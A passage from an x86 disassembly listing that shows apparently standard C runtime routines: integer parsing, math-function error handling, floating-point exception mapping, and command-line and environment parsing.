mov bl, [edi]
inc edi
loc_40A895: ; CODE XREF: sub_40A7DB+B5j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40A9E9
cmp eax, 1
jz loc_40A9E9
cmp eax, 24h
jg loc_40A9E9
test eax, eax
jnz short loc_40A8E0
cmp bl, 30h
jz short loc_40A8C4
mov [ebp+arg_C], 0Ah
jmp short loc_40A8F8
; ---------------------------------------------------------------------------
loc_40A8C4: ; CODE XREF: sub_40A7DB+DEj
mov al, [edi]
cmp al, 78h
jz short loc_40A8D7
cmp al, 58h
jz short loc_40A8D7
mov [ebp+arg_C], 8
jmp short loc_40A8F8
; ---------------------------------------------------------------------------
loc_40A8D7: ; CODE XREF: sub_40A7DB+EDj
; sub_40A7DB+F1j
mov [ebp+arg_C], 10h
jmp short loc_40A8EA
; ---------------------------------------------------------------------------
loc_40A8E0: ; CODE XREF: sub_40A7DB+D9j
cmp eax, 10h
jnz short loc_40A8F8
cmp bl, 30h
jnz short loc_40A8F8
loc_40A8EA: ; CODE XREF: sub_40A7DB+103j
mov al, [edi]
cmp al, 78h
jz short loc_40A8F4
cmp al, 58h
jnz short loc_40A8F8
loc_40A8F4: ; CODE XREF: sub_40A7DB+113j
inc edi
mov bl, [edi]
inc edi
loc_40A8F8: ; CODE XREF: sub_40A7DB+E7j
; sub_40A7DB+FAj ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_40A906: ; CODE XREF: sub_40A7DB+19Dj
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40A91A
movsx ecx, bl
sub ecx, 30h
jmp short loc_40A934
; ---------------------------------------------------------------------------
loc_40A91A: ; CODE XREF: sub_40A7DB+135j
test cx, 103h
jz short loc_40A952
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40A931
sub ecx, 20h
loc_40A931: ; CODE XREF: sub_40A7DB+151j
add ecx, 0FFFFFFC9h
loc_40A934: ; CODE XREF: sub_40A7DB+13Dj
cmp ecx, [ebp+arg_C]
jnb short loc_40A952
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40A969
jnz short loc_40A948
cmp ecx, edx
jbe short loc_40A969
loc_40A948: ; CODE XREF: sub_40A7DB+167j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40A975
loc_40A952: ; CODE XREF: sub_40A7DB+144j
; sub_40A7DB+15Cj
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40A97A
cmp [ebp+arg_8], 0
jz short loc_40A963
mov edi, [ebp+arg_4]
loc_40A963: ; CODE XREF: sub_40A7DB+183j
and [ebp+var_4], 0
jmp short loc_40A9C5
; ---------------------------------------------------------------------------
loc_40A969: ; CODE XREF: sub_40A7DB+165j
; sub_40A7DB+16Bj
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40A975: ; CODE XREF: sub_40A7DB+175j
mov bl, [edi]
inc edi
jmp short loc_40A906
; ---------------------------------------------------------------------------
loc_40A97A: ; CODE XREF: sub_40A7DB+17Dj
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40A99E
test al, 1
jnz short loc_40A9C5
and eax, 2
jz short loc_40A995
cmp [ebp+var_4], 80000000h
ja short loc_40A99E
loc_40A995: ; CODE XREF: sub_40A7DB+1AFj
test eax, eax
jnz short loc_40A9C5
cmp [ebp+var_4], esi
jbe short loc_40A9C5
loc_40A99E: ; CODE XREF: sub_40A7DB+1A6j
; sub_40A7DB+1B8j
call sub_405B83
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40A9B5
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A9C5
; ---------------------------------------------------------------------------
loc_40A9B5: ; CODE XREF: sub_40A7DB+1D2j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40A9C5: ; CODE XREF: sub_40A7DB+18Cj
; sub_40A7DB+1AAj ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9CE
mov [eax], edi
loc_40A9CE: ; CODE XREF: sub_40A7DB+1EFj
test byte ptr [ebp+arg_10], 2
jz short loc_40A9D7
neg [ebp+var_4]
loc_40A9D7: ; CODE XREF: sub_40A7DB+1F7j
cmp [ebp+var_8], 0
jz short loc_40A9E4
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9E4: ; CODE XREF: sub_40A7DB+200j
mov eax, [ebp+var_4]
jmp short loc_40AA01
; ---------------------------------------------------------------------------
loc_40A9E9: ; CODE XREF: sub_40A7DB+BFj
; sub_40A7DB+C8j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9F2
mov [eax], esi
loc_40A9F2: ; CODE XREF: sub_40A7DB+213j
cmp [ebp+var_8], 0
jz short loc_40A9FF
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9FF: ; CODE XREF: sub_40A7DB+21Bj
xor eax, eax
loc_40AA01: ; CODE XREF: sub_40A7DB+20Cj
pop ebx
loc_40AA02: ; CODE XREF: sub_40A7DB+4Cj
pop edi
pop esi
leave
retn
sub_40A7DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA06 proc near ; CODE XREF: sub_40415A+8p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp dword_427940, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AA24
push offset off_423680
jmp short loc_40AA25
; ---------------------------------------------------------------------------
loc_40AA24: ; CODE XREF: sub_40AA06+15j
push eax
loc_40AA25: ; CODE XREF: sub_40AA06+1Cj
call sub_40A7DB
add esp, 14h
pop ebp
retn
sub_40AA06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA2F proc near ; CODE XREF: sub_404170+B5p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
cmp dword_427E50, eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
mov byte ptr [ebp+var_8], al
mov byte ptr [ebp+var_8+1], al
mov byte ptr [ebp+var_8+2], al
mov byte ptr [ebp+var_8+3], al
mov byte ptr [ebp+var_8+4], al
mov byte ptr [ebp+var_8+5], al
mov byte ptr [ebp+var_8+6], al
mov byte ptr [ebp+var_8+7], al
jz short loc_40AA71
push dword_435804
call sub_405543
pop ecx
jmp short loc_40AA76
; ---------------------------------------------------------------------------
loc_40AA71: ; CODE XREF: sub_40AA2F+32j
mov eax, offset sub_40FAB8
loc_40AA76: ; CODE XREF: sub_40AA2F+40j
mov ecx, [ebp+arg_C]
mov edx, 0A6h
cmp ecx, edx
jg loc_40ABFA
jz loc_40ABE7
cmp ecx, 19h
jg loc_40AB8D
jz loc_40AB84
mov edx, ecx
push 2
pop ecx
sub edx, ecx
jz loc_40AB75
dec edx
jz loc_40AB6C
sub edx, 5
jz loc_40AB5D
dec edx
jz loc_40AB45
sub edx, 5
jz short loc_40AB35
dec edx
jz short loc_40AB0C
sub edx, 9
jnz loc_40ACA4 ; default
mov [ebp+var_28], 3
loc_40AAD7: ; CODE XREF: sub_40AA2F+1ACj
mov [ebp+var_24], offset aPow ; "pow"
loc_40AADE: ; CODE XREF: sub_40AA2F+114j
; sub_40AA2F+138j ...
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
test eax, eax
pop ecx
jnz loc_40AC9F
call sub_405B83
mov dword ptr [eax], 22h
jmp loc_40AC9F
; ---------------------------------------------------------------------------
loc_40AB0C: ; CODE XREF: sub_40AA2F+96j
mov [ebp+var_24], offset aExp ; "exp"
loc_40AB13: ; CODE XREF: sub_40AA2F+15Cj
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
mov [ebp+var_28], 4
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
pop ecx
jmp loc_40AC9F
; ---------------------------------------------------------------------------
loc_40AB35: ; CODE XREF: sub_40AA2F+93j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp ; "exp"
jmp short loc_40AADE
; ---------------------------------------------------------------------------
loc_40AB45: ; CODE XREF: sub_40AA2F+8Aj
mov [ebp+var_24], offset aLog10 ; "log10"
loc_40AB4C: ; CODE XREF: sub_40AA2F+144j
; sub_40AA2F+181j ...
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
jmp loc_40AC7F
; ---------------------------------------------------------------------------
loc_40AB5D: ; CODE XREF: sub_40AA2F+83j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog10 ; "log10"
jmp loc_40AADE
; ---------------------------------------------------------------------------
loc_40AB6C: ; CODE XREF: sub_40AA2F+7Aj
mov [ebp+var_24], offset aLog ; "log"
jmp short loc_40AB4C
; ---------------------------------------------------------------------------
loc_40AB75: ; CODE XREF: sub_40AA2F+73j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog ; "log"
jmp loc_40AADE
; ---------------------------------------------------------------------------
loc_40AB84: ; CODE XREF: sub_40AA2F+66j
mov [ebp+var_24], offset aPow ; "pow"
jmp short loc_40AB13
; ---------------------------------------------------------------------------
loc_40AB8D: ; CODE XREF: sub_40AA2F+60j
sub ecx, 1Ah
jz short loc_40ABE0
dec ecx
jz short loc_40ABD4
dec ecx
jz short loc_40ABC8 ; jumptable 0040AC09 case 1006
dec ecx
jz short loc_40ABBB
sub ecx, 1Dh
jz short loc_40ABB2 ; jumptable 0040AC09 case 1008
sub ecx, 3
jnz loc_40ACA4 ; default
loc_40ABA9: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aAsin ; jumptable 0040AC09 case 1009
jmp short loc_40AB4C
; ---------------------------------------------------------------------------
loc_40ABB2: ; CODE XREF: sub_40AA2F+16Fj
; sub_40AA2F+1DAj
; DATA XREF: ...
mov [ebp+var_24], offset aAcos ; jumptable 0040AC09 case 1008
jmp short loc_40AB4C
; ---------------------------------------------------------------------------
loc_40ABBB: ; CODE XREF: sub_40AA2F+16Aj
mov [ebp+var_24], offset aPow ; "pow"
loc_40ABC2: ; CODE XREF: sub_40AA2F+1E8j
; sub_40AA2F+1F1j ...
fld qword ptr [edi]
fstp qword ptr [esi]
jmp short loc_40AB4C
; ---------------------------------------------------------------------------
loc_40ABC8: ; CODE XREF: sub_40AA2F+167j
; sub_40AA2F+1DAj
; DATA XREF: ...
mov [ebp+var_24], offset aPow ; jumptable 0040AC09 case 1006
jmp loc_40AB4C
; ---------------------------------------------------------------------------
loc_40ABD4: ; CODE XREF: sub_40AA2F+164j
mov [ebp+var_28], 2
jmp loc_40AAD7
; ---------------------------------------------------------------------------
loc_40ABE0: ; CODE XREF: sub_40AA2F+161j
fld1
jmp loc_40ACA2
; ---------------------------------------------------------------------------
loc_40ABE7: ; CODE XREF: sub_40AA2F+57j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp10 ; "exp10"
jmp loc_40AADE
; ---------------------------------------------------------------------------
loc_40ABFA: ; CODE XREF: sub_40AA2F+51j
add ecx, 0FFFFFC18h ; switch 13 cases
cmp ecx, 0Ch
ja loc_40ACA4 ; default
jmp ds:off_40ACAB[ecx*4] ; switch jump
loc_40AC10: ; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aLog ; jumptable 0040AC09 case 1000
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC19: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aLog10 ; jumptable 0040AC09 case 1001
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC22: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aExp ; jumptable 0040AC09 case 1002
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC2B: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aAtan ; jumptable 0040AC09 case 1003
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC34: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aCeil ; jumptable 0040AC09 case 1004
jmp short loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC3D: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aFloor ; jumptable 0040AC09 case 1005
jmp loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC49: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset aModf ; jumptable 0040AC09 case 1007
jmp loc_40ABC2
; ---------------------------------------------------------------------------
loc_40AC55: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset dword_41DBD0 ; jumptable 0040AC09 case 1010
jmp short loc_40AC6E
; ---------------------------------------------------------------------------
loc_40AC5E: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset dword_41DBCC ; jumptable 0040AC09 case 1011
jmp short loc_40AC6E
; ---------------------------------------------------------------------------
loc_40AC67: ; CODE XREF: sub_40AA2F+1DAj
; DATA XREF: .text:off_40ACABo
mov [ebp+var_24], offset dword_41DBC8 ; jumptable 0040AC09 case 1012
loc_40AC6E: ; CODE XREF: sub_40AA2F+22Dj
; sub_40AA2F+236j
fld qword ptr [edi]
fmul [ebp+var_8]
fst qword ptr [esi]
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
loc_40AC7F: ; CODE XREF: sub_40AA2F+129j
lea ecx, [ebp+var_28]
fstp [ebp+var_10]
push ecx
mov [ebp+var_28], 1
call eax
test eax, eax
pop ecx
jnz short loc_40AC9F
call sub_405B83
mov dword ptr [eax], 21h
loc_40AC9F: ; CODE XREF: sub_40AA2F+C7j
; sub_40AA2F+D8j ...
fld [ebp+var_10]
loc_40ACA2: ; CODE XREF: sub_40AA2F+1B3j
fstp qword ptr [esi]
loc_40ACA4: ; CODE XREF: sub_40AA2F+9Bj
; sub_40AA2F+174j ...
pop edi ; default
pop esi
pop ebx
leave
retn
sub_40AA2F endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_40ACAB dd offset loc_40AC10 ; DATA XREF: sub_40AA2F+1DAr
dd offset loc_40AC19 ; jump table for switch statement
dd offset loc_40AC22
dd offset loc_40AC2B
dd offset loc_40AC34
dd offset loc_40AC3D
dd offset loc_40ABC8
dd offset loc_40AC49
dd offset loc_40ABB2
dd offset loc_40ABA9
dd offset loc_40AC55
dd offset loc_40AC5E
dd offset loc_40AC67
; =============== S U B R O U T I N E =======================================
sub_40ACDF proc near ; DATA XREF: fabskl8p:0041D2E0o
and dword_4357FC, 0
call sub_40FB8A
mov dword_4357FC, eax
xor eax, eax
retn
sub_40ACDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40ACF3(double)
sub_40ACF3 proc near ; CODE XREF: sub_404170+7j
; sub_404170+38j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_423DB8
call sub_41040E
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_40AD79
call sub_4102ED
test eax, eax
pop ecx
pop ecx
jle short loc_40AD5C
cmp eax, 2
jle short loc_40AD4E
cmp eax, 3
jnz short loc_40AD5C
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_4101A5
add esp, 10h
jmp short loc_40ADC0
; ---------------------------------------------------------------------------
loc_40AD4E: ; CODE XREF: sub_40ACF3+3Fj
push esi
push ebx
call sub_41040E
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40ADC0
; ---------------------------------------------------------------------------
loc_40AD5C: ; CODE XREF: sub_40ACF3+3Aj
; sub_40ACF3+44j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_41DC00
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_40ADB8
; ---------------------------------------------------------------------------
loc_40AD79: ; CODE XREF: sub_40ACF3+2Fj
call sub_4102B2
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fcomp [ebp+var_8]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_40AD9E
loc_40AD90: ; CODE XREF: sub_40ACF3+AEj
push esi
push ebx
call sub_41040E
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_40ADC0
; ---------------------------------------------------------------------------
loc_40AD9E: ; CODE XREF: sub_40ACF3+9Bj
test bl, 20h
jnz short loc_40AD90
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_40ADB8: ; CODE XREF: sub_40ACF3+84j
call sub_4101F8
add esp, 1Ch
loc_40ADC0: ; CODE XREF: sub_40ACF3+59j
; sub_40ACF3+67j ...
pop esi
pop ebx
leave
retn
sub_40ACF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADC4 proc near ; CODE XREF: .text:0040448Bp
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_4056CA
mov esi, eax
test esi, esi
jnz short loc_40ADE3
push [ebp+arg_4]
call ds:off_41D198
jmp loc_40AF30
; ---------------------------------------------------------------------------
loc_40ADE3: ; CODE XREF: sub_40ADC4+Fj
mov edx, [esi+5Ch]
mov eax, dword_423E44
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_40ADF2: ; CODE XREF: sub_40ADC4+3Ej
cmp [ecx], edi
jz short loc_40AE04
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_40ADF2
loc_40AE04: ; CODE XREF: sub_40ADC4+30j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_40AE15
cmp [ecx], edi
jnz short loc_40AE15
mov eax, ecx
jmp short loc_40AE17
; ---------------------------------------------------------------------------
loc_40AE15: ; CODE XREF: sub_40ADC4+47j
; sub_40ADC4+4Bj
xor eax, eax
loc_40AE17: ; CODE XREF: sub_40ADC4+4Fj
test eax, eax
jz short loc_40AE25
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40AE33
loc_40AE25: ; CODE XREF: sub_40ADC4+55j
push [ebp+arg_4]
call ds:off_41D198
jmp loc_40AF2E
; ---------------------------------------------------------------------------
loc_40AE33: ; CODE XREF: sub_40ADC4+5Fj
cmp ebx, 5
jnz short loc_40AE44
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_40AF2E
; ---------------------------------------------------------------------------
loc_40AE44: ; CODE XREF: sub_40ADC4+72j
cmp ebx, 1
jz loc_40AF2B
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_40AF1D
mov ecx, dword_423E38
mov edi, dword_423E3C
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40AE9D
imul ecx, 0Ch
loc_40AE7C: ; CODE XREF: sub_40ADC4+D4j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, dword_423E38
mov ebx, dword_423E3C
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40AE7C
mov ebx, [ebp+var_4]
loc_40AE9D: ; CODE XREF: sub_40ADC4+B3j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_40AEB2
mov dword ptr [esi+64h], 83h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AEB2: ; CODE XREF: sub_40ADC4+E3j
cmp eax, 0C0000090h
jnz short loc_40AEC2
mov dword ptr [esi+64h], 81h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AEC2: ; CODE XREF: sub_40ADC4+F3j
cmp eax, 0C0000091h
jnz short loc_40AED2
mov dword ptr [esi+64h], 84h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AED2: ; CODE XREF: sub_40ADC4+103j
cmp eax, 0C0000093h
jnz short loc_40AEE2
mov dword ptr [esi+64h], 85h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AEE2: ; CODE XREF: sub_40ADC4+113j
cmp eax, 0C000008Dh
jnz short loc_40AEF2
mov dword ptr [esi+64h], 82h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AEF2: ; CODE XREF: sub_40ADC4+123j
cmp eax, 0C000008Fh
jnz short loc_40AF02
mov dword ptr [esi+64h], 86h
jmp short loc_40AF10
; ---------------------------------------------------------------------------
loc_40AF02: ; CODE XREF: sub_40ADC4+133j
cmp eax, 0C0000092h
jnz short loc_40AF10
mov dword ptr [esi+64h], 8Ah
loc_40AF10: ; CODE XREF: sub_40ADC4+ECj
; sub_40ADC4+FCj ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40AF24
; ---------------------------------------------------------------------------
loc_40AF1D: ; CODE XREF: sub_40ADC4+9Bj
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40AF24: ; CODE XREF: sub_40ADC4+157j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_40AF2B: ; CODE XREF: sub_40ADC4+83j
or eax, 0FFFFFFFFh
loc_40AF2E: ; CODE XREF: sub_40ADC4+6Aj
; sub_40ADC4+7Bj
pop ebx
pop edi
loc_40AF30: ; CODE XREF: sub_40ADC4+1Aj
pop esi
leave
retn
sub_40ADC4 endp
; =============== S U B R O U T I N E =======================================
sub_40AF33 proc near ; CODE XREF: sub_4044D2:loc_404448p
push esi
push edi
xor edi, edi
cmp dword_436954, edi
jnz short loc_40AF44
call sub_4051B3
loc_40AF44: ; CODE XREF: sub_40AF33+Aj
mov esi, dword_436978
test esi, esi
jnz short loc_40AF53
mov esi, offset word_41D492
loc_40AF53: ; CODE XREF: sub_40AF33+19j
; sub_40AF33+4Bj
mov al, [esi]
cmp al, 20h
ja short loc_40AF61
test al, al
jz short loc_40AF8B
test edi, edi
jz short loc_40AF85
loc_40AF61: ; CODE XREF: sub_40AF33+24j
cmp al, 22h
jnz short loc_40AF6E
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_40AF6E: ; CODE XREF: sub_40AF33+30j
movzx eax, al
push eax
call sub_41054E
test eax, eax
pop ecx
jz short loc_40AF7D
inc esi
loc_40AF7D: ; CODE XREF: sub_40AF33+47j
inc esi
jmp short loc_40AF53
; ---------------------------------------------------------------------------
loc_40AF80: ; CODE XREF: sub_40AF33+56j
cmp al, 20h
ja short loc_40AF8B
inc esi
loc_40AF85: ; CODE XREF: sub_40AF33+2Cj
mov al, [esi]
test al, al
jnz short loc_40AF80
loc_40AF8B: ; CODE XREF: sub_40AF33+28j
; sub_40AF33+4Fj
pop edi
mov eax, esi
pop esi
retn
sub_40AF33 endp
; =============== S U B R O U T I N E =======================================
sub_40AF90 proc near ; CODE XREF: sub_4044D2:loc_404425p
push ebx
xor ebx, ebx
cmp dword_436954, ebx
push esi
push edi
jnz short loc_40AFA2
call sub_4051B3
loc_40AFA2: ; CODE XREF: sub_40AF90+Bj
mov esi, dword_4275F4
xor edi, edi
cmp esi, ebx
jnz short loc_40AFC6
loc_40AFAE: ; CODE XREF: sub_40AF90+51j
or eax, 0FFFFFFFFh
jmp loc_40B051
; ---------------------------------------------------------------------------
loc_40AFB6: ; CODE XREF: sub_40AF90+3Aj
cmp al, 3Dh
jz short loc_40AFBB
inc edi
loc_40AFBB: ; CODE XREF: sub_40AF90+28j
push esi
call sub_4044E0
pop ecx
lea esi, [esi+eax+1]
loc_40AFC6: ; CODE XREF: sub_40AF90+1Cj
mov al, [esi]
cmp al, bl
jnz short loc_40AFB6
push 4
inc edi
push edi
call sub_407B2A
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov dword_427AF8, edi
jz short loc_40AFAE
mov esi, dword_4275F4
push ebp
jmp short loc_40B02C
; ---------------------------------------------------------------------------
loc_40AFEC: ; CODE XREF: sub_40AF90+9Ej
push esi
call sub_4044E0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_40B02A
push 1
push ebp
call sub_407B2A
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40B055
push esi
push ebp
push eax
call sub_407A85
add esp, 0Ch
test eax, eax
jz short loc_40B027
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_40B027: ; CODE XREF: sub_40AF90+88j
add edi, 4
loc_40B02A: ; CODE XREF: sub_40AF90+69j
add esi, ebp
loc_40B02C: ; CODE XREF: sub_40AF90+5Aj
cmp [esi], bl
jnz short loc_40AFEC
push dword_4275F4
call sub_4039CF
mov dword_4275F4, ebx
mov [edi], ebx
mov dword_436948, 1
xor eax, eax
loc_40B04F: ; CODE XREF: sub_40AF90+D9j
pop ecx
pop ebp
loc_40B051: ; CODE XREF: sub_40AF90+21j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B055: ; CODE XREF: sub_40AF90+79j
push dword_427AF8
call sub_4039CF
mov dword_427AF8, ebx
or eax, 0FFFFFFFFh
jmp short loc_40B04F
sub_40AF90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B06B proc near ; CODE XREF: sub_40B203+55p
; sub_40B203+96p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_40B091
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_40B091: ; CODE XREF: sub_40B06B+1Bj
mov [ebp+var_4], eax
loc_40B094: ; CODE XREF: sub_40B06B+7Ej
; sub_40B06B+88j
cmp byte ptr [esi], 22h
jnz short loc_40B0A9
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40B0E5
; ---------------------------------------------------------------------------
loc_40B0A9: ; CODE XREF: sub_40B06B+2Cj
inc dword ptr [edi]
test edx, edx
jz short loc_40B0B7
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_40B0B7: ; CODE XREF: sub_40B06B+42j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_41054E
test eax, eax
pop ecx
jz short loc_40B0DB
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_40B0DA
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_40B0DA: ; CODE XREF: sub_40B06B+63j
inc esi
loc_40B0DB: ; CODE XREF: sub_40B06B+5Bj
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40B117
loc_40B0E5: ; CODE XREF: sub_40B06B+3Cj
cmp [ebp+var_4], 0
jnz short loc_40B094
cmp bl, 20h
jz short loc_40B0F5
cmp bl, 9
jnz short loc_40B094
loc_40B0F5: ; CODE XREF: sub_40B06B+83j
test edx, edx
jz short loc_40B0FD
mov byte ptr [edx-1], 0
loc_40B0FD: ; CODE XREF: sub_40B06B+8Cj
; sub_40B06B+ADj
and [ebp+var_4], 0
loc_40B101: ; CODE XREF: sub_40B06B+183j
cmp byte ptr [esi], 0
jz loc_40B1F3
loc_40B10A: ; CODE XREF: sub_40B06B+AAj
mov al, [esi]
cmp al, 20h
jz short loc_40B114
cmp al, 9
jnz short loc_40B11A
loc_40B114: ; CODE XREF: sub_40B06B+A3j
inc esi
jmp short loc_40B10A
; ---------------------------------------------------------------------------
loc_40B117: ; CODE XREF: sub_40B06B+78j
dec esi
jmp short loc_40B0FD
; ---------------------------------------------------------------------------
loc_40B11A: ; CODE XREF: sub_40B06B+A7j
cmp byte ptr [esi], 0
jz loc_40B1F3
cmp [ebp+arg_0], 0
jz short loc_40B132
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
